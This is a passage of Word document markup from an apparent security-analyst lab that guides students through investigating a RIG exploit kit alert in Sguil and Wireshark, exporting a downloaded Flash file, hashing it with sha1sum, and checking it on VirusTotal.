              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">In Wireshark, go to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>File &gt; Export Objects &gt; HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> and save the JavaScript file to your home folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2480FC5A">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>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 xml:space="preserve">Close Wireshark. In Sguil, right-click the alert ID 5.25 (Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">) and choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> to pivot to Wireshark. Apply an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>http.request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> display filter. Notice that this alert corresponds to the three GET, POST, and GET requests that we looked at earlier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035DC2EB">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:keepNext/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:num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 xml:space="preserve">With the first packet selected, in the packet details area, expand the Hypertext Transfer Protocol application layer data. Right-click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Host information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> and choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Apply as Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> to add the Host information to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>the packet list columns, as shown in the figure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0B6A04">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:jc w:val="left"/>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8480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>466725</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>178435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5017770" cy="2859405"/>
            <wp:effectExtent l="19050" t="19050" r="11430" b="17145"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="-82" y="-144"/>
                <wp:lineTo x="-82" y="21586"/>
                <wp:lineTo x="21567" y="21586"/>
                <wp:lineTo x="21567" y="-144"/>
                <wp:lineTo x="-82" y="-144"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="42" name="Picture 42" descr="screenshot of wireshark with with apply as colum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of wireshark with with apply as column highligh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017770" cy="2859405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EF0195">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To make room for the Host column right-click the Length column header and uncheck it. This will remove the Length column from the display.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731C7AB5">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The names of the servers are now clearly visible in the Host column of the packet list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269C59D5">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:num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Create a Hash for an Exported Malware File.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572EFF64">
      <w:pPr>
        <w:pStyle w:val="3"/>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We know that the user intended to access www.homeimprovement.com, but the site referred the user to other sites. Eventually files were downloaded to the host from a malware site. In this part of the lab, we will access the files that were downloaded and submit a file hash to VirusTotal to verify that a malicious file was downloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41089651">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:keepNext/>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In Wireshark, go to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>File &gt; Export Objects &gt; HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> and save the two text/html files and the application/x-shockwave-flash file to your home directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017B65FD">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:jc w:val="left"/>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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5227320" cy="1301750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45" name="Picture 45" descr="screenshot of http obje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of http object list"/>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354852" cy="1333524"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7604561A">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Now that you have saved the three files to your home folder, test to see if one of the files matches a known hash value for malware at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>virustotal.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">. Issue a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ls -l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> command to look at the files saved in your home directory. The flash file has the word SeaMonkey near the beginning of the long filename. The filename begins with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>%3fbiw=SeaMonkey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">. Use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">ls -l </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">command with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> to filter out the filename with the pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>seamonkey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">. The option </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> ignores the case distinction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F681052">
      <w:pPr>
        <w:pStyle w:val="46"/>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analyst@SecOnion:~$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ls -l | grep -i seamonkey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7646D5F4">
      <w:pPr>
        <w:pStyle w:val="47"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>-rw-r--r-- 1 analyst analyst 16261 Jun  9 05:50 %3fbiw=SeaMonkey.105qj67.406x7d8b3&amp;yus=SeaMonkey.78vg115.406g6d1r6&amp;br_fl=2957&amp;oq=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E-qKSErM62V7FjLhTJg&amp;q=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-qoVzcCgWRxfs&amp;ct=SeaMonkey&amp;tuif=1166</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168AEC60">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Generate a SHA-1 hash for the SeaMonkey flash file with the command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>sha1sum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> followed by the filename. Type the first 4 letters %3fb of the filename and then press the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>tab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> key to auto fill the rest of the filename. Press enter and sha1sum will compute a 40 digit long fixed length hash value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9AE6BB">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Highlight the hash value, right-click, and copy it. The sha1sum is highlighted in the example below. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>: Remember to use tab completion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53927531">
      <w:pPr>
        <w:pStyle w:val="46"/>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analyst@SecOnion:~$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>sha1sum %3fbiw\=SeaMonkey.105qj67.406x7d8b3\&amp;yus\=SeaMonkey.78vg115.406g6d1r6\&amp;br_fl\=2957\&amp;oq\=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E-qKSErM62V7FjLhTJg\&amp;q\=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-qoVzcCgWRxfs\&amp;ct\=SeaMonkey\&amp;tuif\=1166</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A6A9CD">
      <w:pPr>
        <w:pStyle w:val="47"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>97a8033303692f9b7618056e49a24470525f7290  %3fbiw=SeaMonkey.105qj67.406x7d8b3&amp;yus=SeaMo nkey.78vg115.406g6d1r6&amp;br_fl=2957&amp;oq=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E-qKSErM62V7FjLhTJg&amp;q=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-qoVzcCgWRx fs&amp;ct=SeaMonkey&amp;tuif=1166</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CCDE82">
      <w:pPr>
        <w:pStyle w:val="41"/>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You can also generate a hash value by using NetworkMiner. Navigate to Sguil and right-click the alert ID 5.25 (Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">) and select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>NetworkMinor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> to pivot to NetworkMinor. Select the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> tab. In this example, right-click the file with swf extension and select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Calculate MD5 / SHA1 / SHA256 hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
